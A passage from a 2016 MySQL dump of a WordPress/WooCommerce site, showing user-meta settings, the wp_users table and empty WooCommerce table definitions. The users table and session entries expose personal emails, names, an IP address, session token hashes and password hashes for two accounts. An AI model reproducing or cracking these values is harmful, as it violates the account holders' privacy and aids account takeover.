Safari/537.36\";s:5:\"login\";i:1426983001;}s:64:\"93e2837b14c7ff0a99c082f5e624bcfa2152cb2ef037b3a03d24b69fd34cdce5\";a:4:{s:10:\"expiration\";i:1427231628;s:2:\"ip\";s:13:\"98.246.136.79\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36\";s:5:\"login\";i:1427058828;}s:64:\"d16481455e6945d8c52a4f9e2635f1bf6992f7bd510e20cc8c07355301b51c93\";a:4:{s:10:\"expiration\";i:1427236304;s:2:\"ip\";s:13:\"98.246.136.79\";s:2:\"ua\";s:120:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36\";s:5:\"login\";i:1427063504;}}'),(56,2,'wp_dashboard_quick_press_last_post_id','271'),(57,1,'wp_user-settings','libraryContent=browse&editor=tinymce&hidetb=1&urlbutton=none&align=none&imgsize=medium&advImgDetails=show'),(58,1,'wp_user-settings-time','1427061726'),(64,2,'wp_user-settings','libraryContent=browse&advImgDetails=show&hidetb=1&editor=tinymce&posts_list_mode=list&align=center'),(59,2,'nav_menu_recently_edited','6'),(60,2,'managenav-menuscolumnshidden','a:4:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";}'),(61,2,'metaboxhidden_nav-menus','a:9:{i:0;s:8:\"add-post\";i:1;s:11:\"add-product\";i:2;s:13:\"add-portfolio\";i:3;s:12:\"add-post_tag\";i:4;s:15:\"add-post_format\";i:5;s:15:\"add-product_cat\";i:6;s:15:\"add-product_tag\";i:7;s:22:\"add-portfolio_category\";i:8;s:17:\"add-portfolio_tag\";}'),(62,1,'closedpostboxes_page','a:0:{}'),(63,1,'metaboxhidden_page','a:6:{i:0;s:20:\"tz-meta-box-category\";i:1;s:12:\"revisionsdiv\";i:2;s:10:\"postcustom\";i:3;s:11:\"commentsdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(65,2,'wp_user-settings-time','1426051167'),(66,2,'tgmpa_dismissed_notice_tgmpa','1'),(68,1,'wpcf7_hide_welcome_panel_on','a:1:{i:0;s:3:\"4.1\";}'),(67,1,'_woocommerce_persistent_cart','a:1:{s:4:\"cart\";a:0:{}}'); /*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_users` -- DROP TABLE IF EXISTS `wp_users`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL auto_increment, `user_login` varchar(60) NOT NULL default '', `user_pass` varchar(64) NOT NULL default '', `user_nicename` varchar(50) NOT NULL default '', `user_email` varchar(100) NOT NULL default '', `user_url` varchar(100) NOT NULL default '', `user_registered` datetime NOT NULL default '0000-00-00 00:00:00', `user_activation_key` varchar(60) NOT NULL default '', `user_status` int(11) NOT NULL default '0', `display_name` varchar(250) NOT NULL default '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_users` -- LOCK TABLES `wp_users` WRITE; /*!40000 ALTER TABLE `wp_users` DISABLE KEYS */; INSERT INTO `wp_users` VALUES (1,'tualatinweb','$P$BH/s..gmGBMIVfXVPUv25CfR3JgOMW.','tualatinweb','daniel@tualatinweb.com','http://www.tualatinweb.com','2014-08-13 15:26:49','',0,'Daniel'),(2,'diane','$P$BZMipDvqMNZ.9KqblytWacQH4jtvrp.','diane','diane@fuze7.com','http://www.fuze7.com','2015-02-07 19:00:46','',0,'Diane Economaki'); /*!40000 ALTER TABLE `wp_users` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_attribute_taxonomies` -- DROP TABLE IF EXISTS `wp_woocommerce_attribute_taxonomies`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_attribute_taxonomies` ( `attribute_id` bigint(20) NOT NULL auto_increment, `attribute_name` varchar(200) NOT NULL, `attribute_label` longtext, `attribute_type` varchar(200) NOT NULL, `attribute_orderby` varchar(200) NOT NULL, `attribute_public` int(1) NOT NULL default '1', PRIMARY KEY (`attribute_id`), KEY `attribute_name` (`attribute_name`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_attribute_taxonomies` -- LOCK TABLES `wp_woocommerce_attribute_taxonomies` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_attribute_taxonomies` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_downloadable_product_permissions` -- DROP TABLE IF EXISTS `wp_woocommerce_downloadable_product_permissions`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_downloadable_product_permissions` ( `permission_id` bigint(20) NOT NULL auto_increment, `download_id` varchar(32) NOT NULL, `product_id` bigint(20) NOT NULL, `order_id` bigint(20) NOT NULL default '0', `order_key` varchar(200) NOT NULL, `user_email` varchar(200) NOT NULL, `user_id` bigint(20) default NULL, `downloads_remaining` varchar(9) default NULL, `access_granted` datetime NOT NULL default '0000-00-00 00:00:00', `access_expires` datetime default NULL, `download_count` bigint(20) NOT NULL default '0', PRIMARY KEY (`permission_id`), KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`,`download_id`), KEY `download_order_product` (`download_id`,`order_id`,`product_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_downloadable_product_permissions` -- LOCK TABLES `wp_woocommerce_downloadable_product_permissions` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_downloadable_product_permissions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_order_itemmeta` -- DROP TABLE IF EXISTS `wp_woocommerce_order_itemmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_order_itemmeta` ( `meta_id` bigint(20) NOT NULL auto_increment, `order_item_id` bigint(20) NOT NULL, `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `order_item_id` (`order_item_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_order_itemmeta` -- LOCK TABLES `wp_woocommerce_order_itemmeta` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_order_itemmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_order_items` -- DROP TABLE IF EXISTS `wp_woocommerce_order_items`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_order_items` ( `order_item_id` bigint(20) NOT NULL auto_increment, `order_item_name` longtext NOT NULL, `order_item_type` varchar(200) NOT NULL default '', `order_id` bigint(20) NOT NULL, PRIMARY KEY (`order_item_id`), KEY `order_id` (`order_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_order_items` -- LOCK TABLES `wp_woocommerce_order_items` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_order_items` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_order_items` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_tax_rate_locations` -- DROP TABLE IF EXISTS `wp_woocommerce_tax_rate_locations`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_tax_rate_locations` ( `location_id` bigint(20) NOT NULL auto_increment, `location_code` varchar(255) NOT NULL, `tax_rate_id` bigint(20) NOT NULL, `location_type` varchar(40) NOT NULL, PRIMARY KEY (`location_id`), KEY `tax_rate_id` (`tax_rate_id`), KEY `location_type` (`location_type`), KEY `location_type_code` (`location_type`,`location_code`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_tax_rate_locations` -- LOCK TABLES `wp_woocommerce_tax_rate_locations` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_tax_rate_locations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_tax_rates` -- DROP TABLE IF EXISTS `wp_woocommerce_tax_rates`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_tax_rates` ( `tax_rate_id` bigint(20) NOT NULL auto_increment, `tax_rate_country` varchar(200) NOT NULL default '', `tax_rate_state` varchar(200) NOT NULL default '', `tax_rate` varchar(200) NOT NULL default '', `tax_rate_name` varchar(200) NOT NULL default '', `tax_rate_priority` bigint(20) NOT NULL, `tax_rate_compound` int(1) NOT NULL default '0', `tax_rate_shipping` int(1) NOT NULL default '1', `tax_rate_order` bigint(20) NOT NULL, `tax_rate_class` varchar(200) NOT NULL default '', PRIMARY KEY (`tax_rate_id`), KEY `tax_rate_country` (`tax_rate_country`), KEY `tax_rate_state` (`tax_rate_state`), KEY `tax_rate_class` (`tax_rate_class`), KEY `tax_rate_priority` (`tax_rate_priority`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_tax_rates` -- LOCK TABLES `wp_woocommerce_tax_rates` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_tax_rates` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_tax_rates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_woocommerce_termmeta` -- DROP TABLE IF EXISTS `wp_woocommerce_termmeta`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_woocommerce_termmeta` ( `meta_id` bigint(20) NOT NULL auto_increment, `woocommerce_term_id` bigint(20) NOT NULL, `meta_key` varchar(255) default NULL, `meta_value` longtext, PRIMARY KEY (`meta_id`), KEY `woocommerce_term_id` (`woocommerce_term_id`), KEY `meta_key` (`meta_key`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_woocommerce_termmeta` -- LOCK TABLES `wp_woocommerce_termmeta` WRITE; /*!40000 ALTER TABLE `wp_woocommerce_termmeta` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_woocommerce_termmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Dumping routines for database '1_03378d5_0' -- DELIMITER ;; DELIMITER ; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; -- Dump completed on 2016-05-11 11:25:25